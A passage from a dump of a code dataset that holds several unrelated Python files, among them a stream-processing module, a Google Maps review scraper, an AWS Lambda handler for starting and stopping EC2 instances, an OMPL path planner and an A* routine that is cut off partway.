= lst[remaining_space:]\n buffer_end_ptr = n-remaining_space\n\n # STEP 3: TELL THE RECEIVER PROCESSES THAT THEY HAVE NEW\n # DATA.\n # 1. Set the status of queues that will now get data to\n # 'not empty' or 1.\n # 2. Put a message into the queue of each process that\n # receives a copy of lst.\n\n # Always acquire lock for operations on queue_status or\n # source_status\n self.main_lock.acquire()\n # Step 3.1: Set queue status to \"not empty\" for queues that\n # receive this message.\n for receiver in self.out_to_in[stream_name]:\n # The output stream called stream_name is connected to the\n # input stream called in_stream_name in the receiving\n # process called receiver_proc_name.\n receiver_proc_name, in_stream_name = receiver\n receiver_process_id = self.process_ids[receiver_proc_name]\n # queues status is 1 for not empty, 0 for empty.\n self.queue_status[receiver_process_id] = 1\n # Step 3.2: Send a message to the in_stream signal corresponding\n # to each in_stream saying that new data is available\n # in the buffer between pointers:\n # (buffer_ptr.value, buffer_end_ptr)\n for q, in_stream_signal_name in q_and_in_stream_signal_names:\n q.put((in_stream_signal_name, (buffer_current_ptr, buffer_end_ptr)))\n self.main_lock.release()\n\n # STEP 4: UPDATE BUFFER_PTR TO GET READY FOR NEXT INPUT.\n if isinstance(buffer_ptr, int):\n buffer_ptr = buffer_end_ptr\n else:\n buffer_ptr.value = buffer_end_ptr\n return\n def broadcast(self, receiver_stream_name, msg):\n for process_name in self.all_process_specs.keys():\n this_process = self.all_procs[process_name]\n this_process.in_queue.put((receiver_stream_name, msg))\n\n#-------------------------------------------------------------------\n\n#-------------------------------------------------------------------\ndef copy_buffer_segment(message, out_stream, buffer, in_stream_type):\n \"\"\"\n copy_buffer_segment() is the function executed by the agent\n when a new message arrives. A message is (start, end).\n This function extends out_stream with the segment of the buffer\n between start and end.\n \"\"\"\n start, end = message\n if end >= start:\n return_value = buffer[start:end]\n else:\n # The return value is read from the circular buffer\n # by going to the end of the buffer and adding values\n # from the beginning of the buffer.\n remaining_space = BUFFER_SIZE - start\n segment_length = remaining_space + end\n # Set up an array with appropriate length to be filled in later.\n return_value = multiprocessing.Array(in_stream_type, range(segment_length))\n return_value[:remaining_space] = \\\n multiprocessing.Array(in_stream_type, buffer[start:])\n return_value[remaining_space:] = \\\n multiprocessing.Array(in_stream_type, buffer[:end])\n out_stream.extend(list(return_value))\n return\n#-------------------------------------------------------------------\n\ndef copy_data_to_source(data, source):\n \"\"\"\n Function used by source thread targets.\n See source_thread_target in TEST\n\n \"\"\"\n proc, stream_name = source\n proc.copy_stream(data, stream_name)\n\ndef source_finished(source):\n \"\"\"\n Set the source_status of this source to 0 to\n indicate that this source has terminated execution.\n\n Called by source thread functions.\n \"\"\"\n proc, source_name = source\n process_name = proc.name\n this_source_id = proc.source_ids[process_name][source_name]\n proc.source_status[this_source_id] = 0\n proc.broadcast('source_finished', (process_name, source_name))\n \ndef multicore(processes, connections):\n source_status = multiprocessing.Array('B', MAX_NUM_SOURCES)\n queue_status = multiprocessing.Array('B', MAX_NUM_PROCESSES)\n check_processes_connections_format(processes, connections)\n check_connections_validity(processes, connections)\n procs = {}\n # In the following name is a process name and\n # spec is the specification of the process.\n for name, spec in processes.items():\n procs[name] = Proc(spec, connections, name)\n # Make the dict relating output streams to queues of receiving\n # processes and to in_stream_signal_names.\n for name in processes.keys():\n procs[name].make_out_to_q_and_in_stream_signal_names(procs)\n # Make the dict relating in_streams of processes to output\n # processes and output streams to which they are connected.\n for name in processes.keys():\n procs[name].make_in_to_out(procs, connections)\n\n # Create source ids and set source_status\n source_id_count=0\n source_ids = {}\n for process_name, spec in processes.items():\n source_ids[process_name] = {}\n sources_dict = spec['sources']\n for source_name in sources_dict.keys():\n source_ids[process_name][source_name] = source_id_count\n source_status[source_id_count] = 1\n source_id_count += 1\n for process_name in processes.keys():\n this_process = procs[process_name]\n this_process.source_ids = source_ids\n this_process.source_status = source_status\n\n #Create main_lock and pass it to all processes.\n main_lock = multiprocessing.Lock()\n # Create process ids and set queue_status\n process_id_count=0\n process_ids = {}\n for process_name in processes.keys():\n process_ids[process_name] = process_id_count\n queue_status[process_id_count] = 1\n process_id_count += 1\n for process_name in processes.keys():\n this_process = procs[process_name]\n this_process.process_ids = process_ids\n this_process.queue_status = queue_status\n this_process.main_lock = main_lock\n this_process.NUM_PROCESSES = len(processes)\n this_process.all_process_specs = processes\n this_process.all_procs = procs\n for name in processes.keys():\n procs[name].make_process()\n for name in processes.keys():\n procs[name].process.start()\n for name in processes.keys():\n procs[name].process.join()\n for name in processes.keys():\n procs[name].process.terminate()\n\ndef run_single_process_single_source(source_func, compute_func, source_type='f',\n **source_keyword_args):\n \"\"\"\n Function for creating a multiprocess application consisting\n of a single process with a single source and no actuators\n and with no external input or output streams from or to other\n processes.\n This function creates the process, starts the process and\n finally joins (stops) the process.\n \"\"\"\n\n # Specify processes and connections.\n processes = \\\n {\n 'process':\n {'in_stream_names_types': [('in', source_type)],\n 'out_stream_names_types': [],\n 'compute_func': compute_func,\n 'sources':\n {'single_source':\n {'type': source_type,\n 'func': source_func\n },\n },\n 'actuators': {}\n }\n }\n \n connections = \\\n {\n 'process' :\n {\n 'single_source' : [('process', 'in')]\n }\n }\n\n multicore(processes, connections)\n \n \n#-------------------------------------------------------------\n# TEST\n#-------------------------------------------------------------\n\n@map_e\ndef gg(v, ADD_VALUE):\n return v + ADD_VALUE\n\n@map_e\ndef increment(v): return v+1\n \ndef test_parameter(ADDEND_VALUE):\n # Functions wrapped by agents\n # Function f is used in get_source_data_and_compute_process\n # ADDEND is a keyword arg of f.\n # Note: ADDEND must be passed in the specification of\n # the process. See the line:\n # 'keyword_args' : {'ADDEND' :ADDEND_VALUE},\n def f(in_streams, out_streams, ADDEND):\n gg(in_streams[0], out_streams[0], ADD_VALUE=ADDEND)\n # Function g is used in aggregate_and_output_process\n # Function g has no arguments other than in_streams and out_streams.\n # So we do not have to add 'keyword_args' : {}\n # to the specification of the process.\n def g(in_streams, out_streams):\n s = Stream(name='s')\n increment(in_stream=in_streams[0], out_stream=s)\n print_stream(s, name=s.name)\n\n # Target of source thread.\n def source_thread_target(source):\n num_steps=3\n step_size=3\n for i in range(num_steps):\n data = list(range(i*step_size, (i+1)*step_size))\n copy_data_to_source(data, source)\n time.sleep(0.001)\n source_finished(source)\n return\n\n #---------------------------------------------------------------------\n # Specify processes and connections.\n # This example has two processes:\n # (1) get_source_data_and_compute_process and\n # (2) aggregate_and_output_process.\n \n # Specification of get_source_data_and_compute_process:\n # (1) Inputs: It has a single input stream called 'in' which\n # is of type int ('i').\n # (2) Outputs: It has a single output stream called 'out'\n # which is of type int ('i').\n # (3) Computation: It creates a network of agents that carries\n # out computation in the main thread by calling function f.\n # (4) Keyword arguments: Function f has a keyword argument\n # called ADDEND. This argument must be a constant.\n # (5) sources: This process has a single source called\n # 'acceleration'. The source thread target is specified by\n # the function source_thread_target. This function generates\n # int ('i').\n # (6) actuators: This process has no actuators.\n \n # Specification of aggregate_and_output_process:\n # (1) Inputs: It has a single input stream called 'in' which\n # is of type int ('i').\n # (2) Outputs: It has no outputs.\n # (3) Computation: It creates a network of agents that carries\n # out computation in the main thread by calling function g.\n # (4) Keyword arguments: Function g has no keyword argument\n # (5) sources: This process has no sources\n # (6) actuators: This process has no actuators.\n\n # Connections between processes.\n # (1) Output 'out' of 'get_source_data_and_compute_process' is\n # connected to input 'in' of aggregate_and_output_process.\n # (2) The source, 'acceleration', of 'get_source_data_and_compute_process'\n # is connected to input 'in' of 'get_source_data_and_compute_process'.\n \n processes = \\\n {\n 'get_source_data_and_compute_process':\n {'in_stream_names_types': [('in', 'i')],\n 'out_stream_names_types': [('out', 'i')],\n 'compute_func': f,\n 'keyword_args' : {'ADDEND' :ADDEND_VALUE},\n 'sources':\n {'acceleration':\n {'type': 'i',\n 'func': source_thread_target\n },\n },\n 'actuators': {}\n },\n 'aggregate_and_output_process':\n {'in_stream_names_types': [('in', 'i')],\n 'out_stream_names_types': [],\n 'compute_func': g,\n 'keyword_args' : {},\n 'sources': {},\n 'actuators': {}\n }\n }\n \n connections = \\\n {\n 'get_source_data_and_compute_process' :\n {\n 'out' : [('aggregate_and_output_process', 'in')],\n 'acceleration' : [('get_source_data_and_compute_process', 'in')]\n },\n 'aggregate_and_output_process':\n {}\n }\n #--------------------------------------------------------------------\n\n #--------------------------------------------------------------------\n # Create and run multiple processes in a multicore machine.\n multicore(processes, connections)\n\ndef test_single_process_single_source():\n # Target of source thread.\n def source_func(source):\n num_steps=5\n step_size=4\n for i in range(num_steps):\n data = list(range(i*step_size, (i+1)*step_size))\n copy_data_to_source(data, source)\n time.sleep(0.001)\n source_finished(source)\n def compute_func(in_streams, out_streams):\n print_stream(in_streams[0])\n\n run_single_process_single_source(source_func, compute_func)\n\n\n\n\n\nif __name__ == '__main__':\n print ('Output printed are values of stream s. See function g')\n print ('s[j] = 500 + j, because the ADDEND is 500')\n test_parameter(500)\n test_single_process_single_source()\n","sub_path":"IoTPy/concurrency/multicore.py","file_name":"multicore.py","file_ext":"py","file_size_in_byte":40158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"192465831","text":"import os\nimport sys\nimport numpy as np\nimport cv2\nimport easygui\nfrom error_remover import *\nnaming=np.load(\"database/naming.npy\")\ndatabase=np.load(\"database/data.npy\")\nlocations=np.load(\"database/locations.npy\")\nlabels=np.load(\"database/labels.npy\")\ndef dist(x,y):\n x=np.array(x)\n y=np.array(y)\n #print len(x),len(y)\n return np.sqrt(np.sum((x-y)**2))\ndef match(path,limit):\n #print person\n img=cv2.imread(path,1)\n output,distances,tips,valleys=midfinger(img)\n d=[]\n\n for i in database:\n d.append(dist(distances,i))\n temp=np.copy(labels)\n d,temp=zip(*sorted(zip(d,temp)))\n\n temp=temp[1:limit]\n #for i in temp:\n #print naming[i]\n label=np.bincount(temp).argmax()\n return naming[label]\n\nif __name__=='__main__':\n path=easygui.fileopenbox(\"open the image you want to check on\")\n result=match(path,2)\n easygui.msgbox(result)\n","sub_path":"matcher.py","file_name":"matcher.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"415245254","text":"import sys\nfrom PyQt5.Qt import *\nfrom utils.constance import (\n MAX_RECT_NUM\n)\nimport transit\n\n\nclass Rect(object):\n def __init__(self):\n self.start_x = int()\n self.start_y = int()\n self.end_x = int()\n self.end_y = int()\n self.area = int()\n\n\nclass ImgLb(QLabel):\n rect_list = list()\n flag = False\n right_click = pyqtSignal()\n\n def mousePressEvent(self, a0: QMouseEvent) -> None:\n if a0.buttons() == Qt.LeftButton:\n if a0.x() > transit.img_width or a0.y() > transit.img_height:\n return\n self.flag = True\n self.rect = Rect()\n self.rect_list.append(self.rect)\n if len(self.rect_list) > MAX_RECT_NUM != 0:\n self.rect_list.pop(0)\n self.rect.start_x = a0.x()\n self.rect.start_y = a0.y()\n self.rect.end_x = a0.x()\n self.rect.end_y = a0.y()\n elif a0.buttons() == Qt.RightButton:\n if not transit.img_flag or (a0.y() > transit.img_height or a0.x() > transit.img_width):\n self.right_click.emit()\n\n def mouseMoveEvent(self, a0: QMouseEvent) -> None:\n if self.flag and transit.img_flag:\n x = a0.x()\n y = a0.y()\n if 0 < x < transit.img_width:\n self.rect.end_x = x\n elif x <= 0:\n self.rect.end_x = 0\n else:\n self.rect.end_x = transit.img_width\n if 0 < y < transit.img_height:\n self.rect.end_y = y\n elif y <= 0:\n self.rect.end_y = 0\n else:\n self.rect.end_y = transit.img_height\n self.update()\n\n def mouseReleaseEvent(self, a0: QMouseEvent) -> None:\n if not self.flag:\n return\n self.flag = False\n self.rect.area = abs(self.rect.end_x - self.rect.start_x) * abs(self.rect.end_y - self.rect.start_y)\n if self.rect.area < 9:\n self.rect_list.pop()\n if self.rect.start_x > self.rect.end_x:\n self.rect.start_x, self.rect.end_x = self.rect.end_x, self.rect.start_x\n if self.rect.start_y > self.rect.end_y:\n self.rect.start_y, self.rect.end_y = self.rect.end_y, self.rect.start_y\n\n if len(self.rect_list) == 2:\n big_box = self.rect_list[0]\n sml_box = self.rect_list[1]\n if big_box.area < sml_box.area:\n big_box, sml_box = sml_box, big_box\n temp_start_x = max(big_box.start_x, sml_box.start_x)\n temp_start_y = max(big_box.start_y, sml_box.start_y)\n temp_end_x = min(big_box.end_x, sml_box.end_x)\n temp_end_y = min(big_box.end_y, sml_box.end_y)\n if temp_start_x >= temp_end_x or temp_start_y >= temp_end_y:\n QMessageBox.information(self, \"warning\", \"A small box must be nested in a big box.\", QMessageBox.Ok)\n self.rect_list.pop()\n self.update()\n return\n else:\n index = self.rect_list.index(sml_box)\n sml_box.start_x = temp_start_x\n sml_box.start_y = temp_start_y\n sml_box.end_x = temp_end_x\n sml_box.end_y = temp_end_y\n self.rect_list[index] = sml_box\n self.update()\n\n def paintEvent(self, a0: QPaintEvent) -> None:\n super().paintEvent(a0)\n painter = QPainter()\n painter.begin(self)\n painter.setPen(QPen(Qt.red, 2, Qt.SolidLine))\n for rect in self.rect_list:\n painter.drawRect(rect.start_x, rect.start_y, rect.end_x - rect.start_x, rect.end_y - rect.start_y)\n painter.end()\n","sub_path":"img_lb.py","file_name":"img_lb.py","file_ext":"py","file_size_in_byte":3693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"372386345","text":"\nimport json\n\nimport os\nfrom bs4 import BeautifulSoup\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom datetime import datetime\nimport time\nfrom dateutil.relativedelta import relativedelta\nimport re\n\nclass ReviewScraper():\n def __init__(self):\n self.driver = self.__get_driver()\n\n def __get_driver(self,debug=False):\n options = Options()\n\n if not debug:\n options.add_argument(\"--headless\")\n options.add_argument('--no-sandbox')\n else:\n options.add_argument(\"--window-size=1366,768\")\n options.add_argument('--no-sandbox')\n\n options.add_argument(\"--disable-notifications\")\n options.add_argument('--disable-gpu')\n options.add_argument(\"--lang=en-US\")\n driv_path = '../config/webdrivers/chromedriver.exe'\n input_driver = webdriver.Chrome(options=options, executable_path=driv_path)\n\n return input_driver\n def get_map_url(self, rest_name, rest_add):\n rest_name = rest_name.replace('&', '+%26+')\n url = 'https://www.google.com/search?q=' + rest_name + ' ' + rest_add\n self.driver.get(url)\n time.sleep(1)\n\n response = BeautifulSoup(self.driver.page_source, 'html.parser')\n for res in response.find_all('a', href=True):\n if 'maps.google' in res['href']:\n map_url = res['href']\n return map_url\n def __sort_review(self):\n wait = WebDriverWait(self.driver, 10)\n\n menu_bt = wait.until(EC.element_to_be_clickable((By.XPATH, '//button[@data-value=\\'Sort\\']')))\n menu_bt.click()\n time.sleep(1)\n recent_rating_bt = self.driver.find_elements_by_xpath('//li[@role=\\'menuitemradio\\']')[1]\n recent_rating_bt.click()\n time.sleep(0.5)\n\n\n def __goto_review(self):\n links = self.driver.find_elements_by_xpath('//button[@jsaction=\\'pane.rating.moreReviews\\']')\n # print(links)\n for l in links:\n # print(\"Element is visible? \" + str(l.is_displayed()))\n l.click()\n time.sleep(1)\n\n def __scroll(self):\n\n scrollable_div = self.driver.find_element_by_xpath('//*[@id=\"pane\"]/div/div[1]/div/div/div[2]')\n prev_scroll_height = None\n while True:\n self.driver.execute_script('arguments[0].scrollTop = arguments[0].scrollHeight',\n scrollable_div)\n last_height = (self.driver.execute_script(\"return arguments[0].scrollTop\", scrollable_div))\n\n scroll_height = (self.driver.execute_script(\"return arguments[0].scrollHeight\", scrollable_div))\n\n if scroll_height == prev_scroll_height:\n # print('End of Scrolling')\n break\n prev_scroll_height = scroll_height\n time.sleep(1.25)\n\n def __expand_reviews(self):\n links = self.driver.find_elements_by_xpath('//button[@jsaction=\\'pane.review.expandReview\\']')\n for l in links:\n l.click()\n time.sleep(0.25)\n # print('Review Expanded')\n\n def url_setup(self,url):\n self.driver.get(url)\n time.sleep(2)\n self.__goto_review()\n self.__sort_review()\n\n def get_reviews_block(self, offset,cbg, place_id):\n\n # scroll to load reviews\n\n self.__scroll()\n\n self.__expand_reviews()\n\n resp = BeautifulSoup(self.driver.page_source, 'html.parser')\n\n rblock = resp.find_all('div', class_='ODSEW-ShBeI NIyLF-haAclf gm2-body-2')\n parsed_reviews = []\n for index, review in enumerate(rblock):\n if index >= offset:\n parsed_reviews.append(self.parse_review(review,cbg, place_id))\n # print(self.parse_review(review,cbg))\n\n return parsed_reviews\n\n # def parse_fname(self, fpath):\n\n\n def get_reviews(self,N,cbg, place_id,rest_name, rest_add):\n map_url = self.get_map_url(rest_name, rest_add)\n self.url_setup(map_url)\n\n n = 0\n all_revs = []\n dpath = '../data/outputs/reviews/'\n os.makedirs(dpath, exist_ok=True)\n fpath = dpath + str(cbg) + '_' + place_id + '.json'\n file_list = [dpath + f for f in os.listdir(dpath)]\n last_counter = -1\n if fpath not in file_list:\n while ((n < N) and (n != last_counter)):\n\n reviews = self.get_reviews_block( n,cbg, place_id)\n\n for r in reviews:\n all_revs.append(r)\n\n with open(fpath, 'w') as outfile:\n json.dump(all_revs,outfile, indent=4, sort_keys=True, default=str)\n #\n # json.dump(all_revs, outfile, indent=4)\n n += len(reviews)\n\n last_counter = n\n return all_revs\n\n def filter_string(self, str):\n strOut = str.replace('\\r', ' ').replace('\\n', ' ').replace('\\t', ' ').replace(\"\\\\\",\"\")\n return strOut\n\n def parse_review(self,result,cbg, place_id):\n\n\n rev_item = {}\n if (result.find('span', class_='ODSEW-ShBeI-H1e3jb') != None):\n rev_item['user_name'] = (result['aria-label'])\n\n rev_item['review_id'] = result['data-review-id']\n user_link = result.find('div', class_='ODSEW-ShBeI-content').find('a', class_=\"ODSEW-ShBeI-t1uDwd-hSRGPd\")[\n 'href']\n rev_item['user_id'] = [int(s) for s in user_link.split('/') if s.isdigit()][0]\n if 'aria-label' in result.find('span', class_='ODSEW-ShBeI-H1e3jb').attrs:\n rev_item['rating'] = int(result.find('span', class_='ODSEW-ShBeI-H1e3jb')['aria-label'][:2])\n\n dt = (result.find('span', class_='ODSEW-ShBeI-RgZmSc-date').text)\n dt = dt.replace('a ', '1 ')\n dt = dt.replace('an ', '1 ')\n value, unit = re.search(r'(\\d+) (\\w+) ago', dt).groups()\n\n if not unit.endswith('s'): unit += 's'\n delta = relativedelta(**{unit: int(value)})\n rev_item['review_date'] = datetime.now() - delta\n\n rev_item['review'] = result.find('span', class_='ODSEW-ShBeI-text').text\n\n user_info = result.find('div', class_='ODSEW-ShBeI-VdSJob')\n if user_info:\n\n if 'style' in user_info.find('span').attrs:\n rev_item['local_guide'] = 'No'\n\n else:\n rev_item['local_guide'] = 'Yes'\n n_reviews = user_info.find_all('span')[1].text\n if 'reviews' in n_reviews:\n n_reviews = n_reviews.replace(',','')\n rev_item['user_reviews'] = int(re.findall(r'(\\d+)', n_reviews)[0])\n\n\n user_pics = result.find('div', class_='ODSEW-ShBeI-Jz7rA')\n n_pics = 0\n if user_pics:\n n_pics = len(user_pics.find_all('button'))\n rev_item['user_pictures'] = n_pics\n rev_item['cbg'] = cbg\n rev_item['place_id'] = place_id\n return rev_item\n\n def get_place_data(self,url):\n\n self.driver.get(url)\n\n # ajax call also for this section\n time.sleep(2)\n place = {}\n resp = BeautifulSoup(self.driver.page_source, 'html.parser')\n try:\n place['overall_rating'] = float(resp.find('div', class_='gm2-display-2').text.replace(',', '.'))\n except:\n place['overall_rating'] = 'NOT FOUND'\n\n try:\n place['n_reviews'] = int(self.driver.find_elements_by_xpath('//button[@jsaction=\\'pane.reviewChart.moreReviews\\']')[0].text.split(' ')[0])\n except:\n place['n_reviews'] = 0\n\n return place\n\n def generate_map_url(self, rest_name, rest_add):\n url = 'https://www.google.com/search?q=' + rest_name + ' ' + rest_add\n self.driver.get(url)\n response = BeautifulSoup(self.driver.page_source, 'html.parser')\n\n for res in response.find_all('a', href=True):\n if 'maps.google' in res['href']:\n map_url = res['href']\n return map_url\n\n def scrape_reviews(self,rest_name, rest_add, cbg, place_id):\n map_url = self.generate_map_url(rest_name, rest_add)\n self.get_reviews(self, N, cbg, place_id, map_url)\n\n","sub_path":"src/utils/review_etl.py","file_name":"review_etl.py","file_ext":"py","file_size_in_byte":8497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"153471060","text":"import boto3\nimport json\nfrom utils import create_response\n\ndef lambda_handler(event, context):\n ec2 = boto3.resource('ec2')\n\n request_body = event\n\n if (request_body['secret'] != secret_password):\n return create_response('Incorrect secret. Please enter a valid secret to alter server settings', None)\n\n instance_id = request_body['instance_id']\n instances = list(ec2.instances.filter(InstanceIds=[instance_id]))\n\n if (len(instances) != 1):\n return create_response(f'Instance: {instance_id} not found', None)\n\n instance = instances[0]\n message = ''\n\n # AWS instance state codes reference:\n # 0 : pending\n # 16 : running\n # 32 : shutting-down\n # 48 : terminated\n # 64 : stopping\n # 80 : stopped\n\n if (instance.state['Name'] == 'running'):\n # shut er down\n instance.stop()\n message = f'Initiated stop server command on {instance_id}'\n\n elif (instance.state['Name'] == 'stopped'):\n # start er up\n instance.start()\n message = f'Initiated start server command on {instance_id}'\n\n else:\n # pending, shutting down, terminated, or stopping\n message = f'Server is busy starting, shutting down, terminating, or stopping. Please try again later'\n\n return create_response(None, message)\n","sub_path":"python/post.py","file_name":"post.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"56253633","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('ik_events_todays_occurrences', '0001_initial'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='todaysoccurrences',\n name='fall_back_to_next_day',\n field=models.BooleanField(default=True, help_text=b\"if there are no events to show on a day, show the next day's instead.\"),\n ),\n migrations.AddField(\n model_name='todaysoccurrences',\n name='title',\n field=models.CharField(max_length=255, help_text=b'Title to show. Natural date is appended.', blank=True),\n ),\n ]\n","sub_path":"icekit_events/plugins/todays_occurrences/migrations/0002_auto_20161207_1928.py","file_name":"0002_auto_20161207_1928.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"650921297","text":"from ompl import util as ou\nfrom ompl import base as ob\nfrom ompl import geometric as og\nfrom math import sqrt\nimport matplotlib.pyplot as plt\nimport random\n\nradius = 100\ncenter = [250, 250]\n\n\nclass ValidityChecker(ob.StateValidityChecker):\n # Returns whether the given state's position overlaps the\n # circular obstacle\n def isValid(self, state):\n x = state[0]\n y = state[1]\n # if (self.clearance(state) < 0.0):\n # print(\"x:\",x,\", y:\",y,\",clearance: \",self.clearance(state))\n return self.clearance(state) > 0.0\n\n # Returns the distance from the given state's position to the\n # boundary of the circular obstacle.\n def clearance(self, state):\n # Extract the robot's (x,y) position from its state\n x = state[0]\n y = state[1]\n # Distance formula between two points, offset by the circle's\n # radius\n return sqrt((x - center[0]) * (x - center[0]) + (y - center[0]) * (y - center[0])) - radius\n\n\ndef getPathLengthObjective(si):\n return ob.PathLengthOptimizationObjective(si)\n\n\ndef getThresholdPathLengthObj(si):\n obj = ob.PathLengthOptimizationObjective(si)\n obj.setCostThreshold(ob.Cost(1.51))\n return obj\n\n\n# Keep these in alphabetical order and all lower case\ndef allocatePlanner(si, plannerType):\n if plannerType.lower() == \"bfmtstar\":\n return og.BFMT(si)\n elif plannerType.lower() == \"bitstar\":\n return og.BITstar(si)\n elif plannerType.lower() == \"fmtstar\":\n return og.FMT(si)\n elif plannerType.lower() == \"informedrrtstar\":\n return og.InformedRRTstar(si)\n elif plannerType.lower() == \"prmstar\":\n return og.PRMstar(si)\n elif plannerType.lower() == \"rrt\":\n return og.RRT(si)\n elif plannerType.lower() == \"rrtstar\":\n return og.RRTstar(si)\n elif plannerType.lower() == \"sorrtstar\":\n return og.SORRTstar(si)\n else:\n ou.OMPL_ERROR(\"Planner-type is not implemented in allocation function.\")\n\n\n# Keep these in alphabetical order and all lower case\ndef allocateObjective(si, objectiveType):\n if objectiveType.lower() == \"pathclearance\":\n return getClearanceObjective(si)\n elif objectiveType.lower() == \"pathlength\":\n return getPathLengthObjective(si)\n elif objectiveType.lower() == \"thresholdpathlength\":\n return getThresholdPathLengthObj(si)\n elif objectiveType.lower() == \"weightedlengthandclearancecombo\":\n return getBalancedObjective1(si)\n else:\n ou.OMPL_ERROR(\"Optimization-objective is not implemented in allocation function.\")\n\n\ndef plan(runTime, plannerType, objectiveType, fname):\n # Construct the robot state space in which we're planning. We're\n # planning in [0,500]x[0,500], a subset of R^2.\n space = ob.RealVectorStateSpace(2)\n\n # Set the bounds of space to be in [0,500].\n space.setBounds(0.0, 500.0)\n\n # Construct a space information instance for this state space\n si = ob.SpaceInformation(space)\n\n # Set the object used to check which states in the space are valid\n validityChecker = ValidityChecker(si)\n si.setStateValidityChecker(validityChecker)\n\n si.setup()\n\n # Set our robot's starting state to be random\n start = ob.State(space)\n start[0] = random.randint(0, 500)\n start[1] = random.randint(0, 500)\n\n while (sqrt((start[0] - center[0]) * (start[0] - center[0]) + (start[1] - center[0]) * (\n start[1] - center[0])) - radius < 0):\n start[0] = random.randint(0, 500)\n start[1] = random.randint(0, 500)\n\n # Set our robot's goal state to be random \n goal = ob.State(space)\n goal[0] = random.randint(0, 500)\n goal[1] = random.randint(0, 500)\n while (sqrt((goal[0] - center[0]) * (goal[0] - center[0]) + (goal[1] - center[0]) * (\n goal[1] - center[0])) - radius < 0):\n goal[0] = random.randint(0, 500)\n goal[1] = random.randint(0, 500)\n\n # Create a problem instance\n pdef = ob.ProblemDefinition(si)\n\n # Set the start and goal states\n pdef.setStartAndGoalStates(start, goal)\n\n # Create the optimization objective specified by our command-line argument.\n # This helper function is simply a switch statement.\n pdef.setOptimizationObjective(allocateObjective(si, objectiveType))\n\n # Construct the optimal planner specified by our command line argument.\n # This helper function is simply a switch statement.\n optimizingPlanner = allocatePlanner(si, plannerType)\n\n # Set the problem instance for our planner to solve\n optimizingPlanner.setProblemDefinition(pdef)\n optimizingPlanner.setup()\n\n # attempt to solve the planning problem in the given runtime\n solved = optimizingPlanner.solve(runTime)\n\n if solved:\n # Output the length of the path found\n print('{0} found solution of path length {1:.4f} with an optimization ' \\\n 'objective value of {2:.4f}'.format( \\\n optimizingPlanner.getName(), \\\n pdef.getSolutionPath().length(), \\\n pdef.getSolutionPath().cost(pdef.getOptimizationObjective()).value()))\n matrix = pdef.getSolutionPath().printAsMatrix()\n print(matrix)\n verts = []\n for line in matrix.split(\"\\n\"):\n x = []\n for item in line.split():\n x.append(float(item))\n if len(x) is not 0:\n verts.append(list(x))\n # print(verts)\n plt.axis([0, 500, 0, 500])\n x = []\n y = []\n for i in range(0, len(verts)):\n x.append(verts[i][0])\n y.append(verts[i][1])\n # plt.plot(verts[i][0], verts[i][1], 'r*-')\n plt.plot(x, y, 'ro-')\n plt.show()\n # If a filename was specified, output the path as a matrix to\n # that file for visualization\n if fname:\n with open(fname, 'w') as outFile:\n outFile.write(pdef.getSolutionPath().printAsMatrix())\n else:\n print(\"No solution found.\")\n\n\nif __name__ == \"__main__\":\n plan(10, 'RRT', 'PathLength', 'path.txt')\n","sub_path":"RRT_old.py","file_name":"RRT_old.py","file_ext":"py","file_size_in_byte":6035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"596957496","text":"#!/usr/bin/python36\nimport subprocess as sp\n\n\n\nclass Port:\n#\tports=sp.getoutput(\"sudo netstat -tunlep | grep LISTEN | awk '{print $4}' \")\n\tports=\"\"\n\tusedPorts=[]\n\tnewPort=0\n\tdef __init__(self):\n\t\tself.ports=sp.getoutput(\"sudo netstat -tunlep | grep LISTEN | awk '{print $4}' \")\n\t\tself.ports = self.ports.split(\"\\n\")\n\t\tself.usedPorts=[]\n\t\tself.newPort=0\n\tdef getUsedPorts(self):\n\t\tfor i in self.ports:\n\t\t\tself.usedPorts.append(int(i.split(\":\")[-1]))\n\t\treturn self.usedPorts\t\n\tdef getNewPort(self):\n\t\tself.usedPorts=self.getUsedPorts()\n\t\tfor i in range(1024,65535):\n\t\t\tif i not in self.usedPorts:\n\t\t\t\tself.newPort=i\n\t\t\t\treturn self.newPort\n\t\t\t\tbreak\n\t\t\ti=i+1\n\n#test.getUsedPorts()\n#clientName=input(\"enter client name: \")\n\n#print(sp.getoutput(\"docker run -dit --name {} -p {}:3333 xpra_vlc:v4\".format(clientName,newPort)))\n#print(newPort)\n#print(\"website is available at http://192.168.56.101:{}\".format(newPort))\n","sub_path":"cgi-bin/major2/port.py","file_name":"port.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"524618941","text":"#!/usr/bin/python3\ndef reconstruct_path(came_from, current):\n total_path = [current]\n while current in came_from:\n current = came_from[current]\n total_path.insert(0, current)\n\n return total_path\n\n\nINF = float('inf')\n\n\ndef a_star(start, goal, neighbors, h):\n open_set = [start]\n came_from = {}\n\n # Cost of path from start node to n\n g_score = {}\n g_score[start] = 0\n\n # Estimated cost of path from start node through n to goal\n # This is an estimate of the total path cost\n f_score = {}\n f_score[start] = h(start, goal)\n\n while len(open_set) > 0:\n open_set.sort(key=lambda id: f_score.get(id, INF))\n current = open_set.pop(0)\n\n if current == goal:\n return reconstruct_path(came_from, current)\n\n for neighbor, d in neighbors(current):\n tentative_g_score = 